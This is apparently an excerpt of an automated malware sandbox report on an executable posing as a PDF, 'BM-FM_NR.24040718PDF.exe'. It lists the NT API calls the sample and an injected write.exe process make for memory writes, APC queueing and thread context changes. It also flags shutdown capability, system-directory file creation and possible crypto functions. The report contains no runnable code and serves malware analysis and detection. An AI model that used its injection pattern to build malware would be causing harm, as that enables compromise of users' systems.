Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22ED0 NtResumeThread, 2_2_36B22ED0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22EC0 NtQuerySection, 2_2_36B22EC0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22E00 NtQueueApcThread, 2_2_36B22E00
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22E50 NtCreateSection, 2_2_36B22E50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22FB0 NtSetValueKey, 2_2_36B22FB0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22F30 NtOpenDirectoryObject, 2_2_36B22F30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22F00 NtCreateFile, 2_2_36B22F00
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22CF0 NtDelayExecution, 2_2_36B22CF0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22CD0 NtEnumerateKey, 2_2_36B22CD0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22C30 NtMapViewOfSection, 2_2_36B22C30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22C20 NtSetInformationFile, 2_2_36B22C20
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22C10 NtOpenProcess, 2_2_36B22C10
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22C50 NtUnmapViewOfSection, 2_2_36B22C50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22DA0 NtReadVirtualMemory, 2_2_36B22DA0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22DC0 NtAdjustPrivilegesToken, 2_2_36B22DC0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22D50 NtWriteVirtualMemory, 2_2_36B22D50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22AA0 NtQueryInformationFile, 2_2_36B22AA0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22A80 NtClose, 2_2_36B22A80
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22AC0 NtEnumerateValueKey, 2_2_36B22AC0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22A10 NtWriteFile, 2_2_36B22A10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05204570 NtSuspendThread,LdrInitializeThunk, 5_2_05204570
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05204260 NtSetContextThread,LdrInitializeThunk, 5_2_05204260
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202D10 NtQuerySystemInformation,LdrInitializeThunk, 5_2_05202D10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202DA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_05202DA0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C30 NtMapViewOfSection,LdrInitializeThunk, 5_2_05202C30
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C50 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_05202C50
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202CF0 NtDelayExecution,LdrInitializeThunk, 5_2_05202CF0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202F00 NtCreateFile,LdrInitializeThunk, 5_2_05202F00
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202E00 NtQueueApcThread,LdrInitializeThunk, 5_2_05202E00
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202E50 NtCreateSection,LdrInitializeThunk, 5_2_05202E50
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202ED0 NtResumeThread,LdrInitializeThunk, 5_2_05202ED0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052029F0 NtReadFile,LdrInitializeThunk, 5_2_052029F0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B00 NtQueryValueKey,LdrInitializeThunk, 5_2_05202B00
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B10 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_05202B10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B80 NtCreateKey,LdrInitializeThunk, 5_2_05202B80
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B90 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_05202B90
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202BC0 NtQueryInformationToken,LdrInitializeThunk, 5_2_05202BC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202A10 NtWriteFile,LdrInitializeThunk, 5_2_05202A10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202A80 NtClose,LdrInitializeThunk, 5_2_05202A80
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202AC0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_05202AC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052034E0 NtCreateMutant,LdrInitializeThunk, 5_2_052034E0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052038D0 NtGetContextThread,LdrInitializeThunk, 5_2_052038D0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202D50 NtWriteVirtualMemory, 5_2_05202D50
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202DC0 NtAdjustPrivilegesToken, 5_2_05202DC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C20 NtSetInformationFile, 5_2_05202C20
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C10 NtOpenProcess, 5_2_05202C10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202CD0 NtEnumerateKey, 5_2_05202CD0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202F30 NtOpenDirectoryObject, 5_2_05202F30
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202FB0 NtSetValueKey, 5_2_05202FB0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202EB0 NtProtectVirtualMemory, 5_2_05202EB0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202E80 NtCreateProcessEx, 5_2_05202E80
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202EC0 NtQuerySection, 5_2_05202EC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052029D0 NtWaitForSingleObject, 5_2_052029D0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B20 NtQueryInformationProcess, 5_2_05202B20
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202BE0 NtQueryVirtualMemory, 5_2_05202BE0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202AA0 NtQueryInformationFile, 5_2_05202AA0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05203C30 NtOpenProcessToken, 5_2_05203C30
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05203C90 NtOpenThread, 5_2_05203C90
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE76B0 NtCreateFile, 5_2_02FE76B0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE7AC0 NtAllocateVirtualMemory, 5_2_02FE7AC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE78E0 NtDeleteFile, 5_2_02FE78E0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE7800 NtReadFile, 5_2_02FE7800
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE7970 NtClose, 5_2_02FE7970
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040310F
Creates files inside the system directory
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Windows\resources\0409 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_004048C5 0_2_004048C5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_004064CB 0_2_004064CB
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00406CA2 0_2_00406CA2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAF6F6 2_2_36BAF6F6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B636EC 2_2_36B636EC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8D62C 2_2_36B8D62C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B91623 2_2_36B91623
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9D646 2_2_36B9D646
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B85490 2_2_36B85490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5D480 2_2_36B5D480
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAF5C9 2_2_36BAF5C9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA75C6 2_2_36BA75C6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B35550 2_2_36B35550
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADD2EC 2_2_36ADD2EC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA124C 2_2_36BA124C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAF330 2_2_36BAF330
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B2508C 2_2_36B2508C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA70F1 2_2_36BA70F1
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFB0D0 2_2_36AFB0D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF51C0 2_2_36AF51C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8D130 2_2_36B8D130
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B3717A 2_2_36B3717A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB9143 2_2_36BB9143
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA9ED2 2_2_36BA9ED2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B93FA0 2_2_36B93FA0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA1FC6 2_2_36BA1FC6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAFF63 2_2_36BAFF63
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6FF40 2_2_36B6FF40
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B89C98 2_2_36B89C98
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0FCE0 2_2_36B0FCE0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B77CE8 2_2_36B77CE8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF3C60 2_2_36AF3C60
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8FDF4 2_2_36B8FDF4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF9DD0 2_2_36AF9DD0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA3D22 2_2_36BA3D22
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAFD27 2_2_36BAFD27
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA7D4C 2_2_36BA7D4C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0FAA0 2_2_36B0FAA0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAFA89 2_2_36BAFA89
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B81B80 2_2_36B81B80
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAFB2E 2_2_36BAFB2E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B2DB19 2_2_36B2DB19
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B698B2 2_2_36B698B2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA78F3 2_2_36BA78F3
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA18DA 2_2_36BA18DA
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF3800 2_2_36AF3800
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B870 2_2_36B0B870
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B65870 2_2_36B65870
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAF872 2_2_36BAF872
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF9870 2_2_36AF9870
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AB99E8 2_2_36AB99E8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B359C0 2_2_36B359C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF0680 2_2_36AF0680
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEC6E0 2_2_36AEC6E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAA6C0 2_2_36BAA6C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0C600 2_2_36B0C600
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B14670 2_2_36B14670
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF2760 2_2_36AF2760
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFA760 2_2_36AFA760
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA6757 2_2_36BA6757
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF0445 2_2_36AF0445
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBA526 2_2_36BBA526
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AB2245 2_2_36AB2245
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFE310 2_2_36AFE310
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE00A0 2_2_36AE00A0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9E076 2_2_36B9E076
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB010E 2_2_36BB010E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA0EAD 2_2_36BA0EAD
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE2EE8 2_2_36AE2EE8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B90E6D 2_2_36B90E6D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B10E50 2_2_36B10E50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B32E48 2_2_36B32E48
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAEFBF 2_2_36BAEFBF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF6FE0 2_2_36AF6FE0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFCF00 2_2_36AFCF00
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBACEB 2_2_36BBACEB
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B08CDF 2_2_36B08CDF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFAC20 2_2_36AFAC20
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6EC20 2_2_36B6EC20
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE0C12 2_2_36AE0C12
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA6C69 2_2_36BA6C69
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAEC60 2_2_36BAEC60
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9EC4C 2_2_36B9EC4C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B02DB0 2_2_36B02DB0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEAD00 2_2_36AEAD00
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF0D69 2_2_36AF0D69
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B92AC0 2_2_36B92AC0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BACA13 2_2_36BACA13
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0529A526 5_2_0529A526
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D0445 5_2_051D0445
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D2760 5_2_051D2760
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051DA760 5_2_051DA760
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05286757 5_2_05286757
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051EC600 5_2_051EC600
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051F4670 5_2_051F4670
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D0680 5_2_051D0680
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528A6C0 5_2_0528A6C0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051CC6E0 5_2_051CC6E0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0529010E 5_2_0529010E
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0527E076 5_2_0527E076
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051C00A0 5_2_051C00A0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051DE310 5_2_051DE310
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051CAD00 5_2_051CAD00
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D0D69 5_2_051D0D69
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051E2DB0 5_2_051E2DB0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0524EC20 5_2_0524EC20
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051C0C12 5_2_051C0C12
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051DAC20 5_2_051DAC20
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05286C69 5_2_05286C69
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528EC60 5_2_0528EC60
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0527EC4C 5_2_0527EC4C
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051E8CDF 5_2_051E8CDF
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0529ACEB 5_2_0529ACEB
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051DCF00 5_2_051DCF00
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528EFBF 5_2_0528EFBF
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D6FE0 5_2_051D6FE0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05270E6D 5_2_05270E6D
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051F0E50 5_2_051F0E50
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05212E48 5_2_05212E48
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05280EAD 5_2_05280EAD
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051C2EE8 5_2_051C2EE8
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528E9A6 5_2_0528E9A6
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051CE9A0 5_2_051CE9A0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051FE810 5_2_051FE810
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05270835 5_2_05270835
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051B6868 5_2_051B6868
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051E6882 5_2_051E6882
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0526C89F 5_2_0526C89F
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D28C0 5_2_051D28C0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D0B10 5_2_051D0B10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05244BC0 5_2_05244BC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528CA13 5_2_0528CA13
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528EA5B 5_2_0528EA5B
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05272AC0 5_2_05272AC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05215550 5_2_05215550
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528F5C9 5_2_0528F5C9
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052875C6 5_2_052875C6
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0523D480 5_2_0523D480
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05265490 5_2_05265490
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05271623 5_2_05271623
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0526D62C 5_2_0526D62C
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0527D646 5_2_0527D646
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052436EC 5_2_052436EC
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528F6F6 5_2_0528F6F6
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051BF113 5_2_051BF113
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0526D130 5_2_0526D130
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0521717A 5_2_0521717A
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05299143 5_2_05299143
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D51C0 5_2_051D51C0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051EB1E0 5_2_051EB1E0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0520508C 5_2_0520508C
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051DB0D0 5_2_051DB0D0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052870F1 5_2_052870F1
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528F330 5_2_0528F330
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051C1380 5_2_051C1380
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528124C 5_2_0528124C
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051BD2EC 5_2_051BD2EC
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05283D22 5_2_05283D22
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528FD27 5_2_0528FD27
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05287D4C 5_2_05287D4C
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D9DD0 5_2_051D9DD0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0526FDF4 5_2_0526FDF4
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D3C60 5_2_051D3C60
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05269C98 5_2_05269C98
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05257CE8 5_2_05257CE8
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051EFCE0 5_2_051EFCE0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528FF63 5_2_0528FF63
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0524FF40 5_2_0524FF40
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05273FA0 5_2_05273FA0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05281FC6 5_2_05281FC6
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D1EB2 5_2_051D1EB2
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05289ED2 5_2_05289ED2
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052159C0 5_2_052159C0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D3800 5_2_051D3800
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05245870 5_2_05245870
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528F872 5_2_0528F872
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051D9870 5_2_051D9870
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051EB870 5_2_051EB870
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052498B2 5_2_052498B2
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052878F3 5_2_052878F3
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052818DA 5_2_052818DA
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528FB2E 5_2_0528FB2E
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0520DB19 5_2_0520DB19
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05261B80 5_2_05261B80
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_0528FA89 5_2_0528FA89
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051EFAA0 5_2_051EFAA0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FD1300 5_2_02FD1300
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCA780 5_2_02FCA780
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCA776 5_2_02FCA776
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCC700 5_2_02FCC700
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCC4E0 5_2_02FCC4E0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCC4D9 5_2_02FCC4D9
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FD2E60 5_2_02FD2E60
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FD2E5B 5_2_02FD2E5B
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC1121 5_2_02FC1121
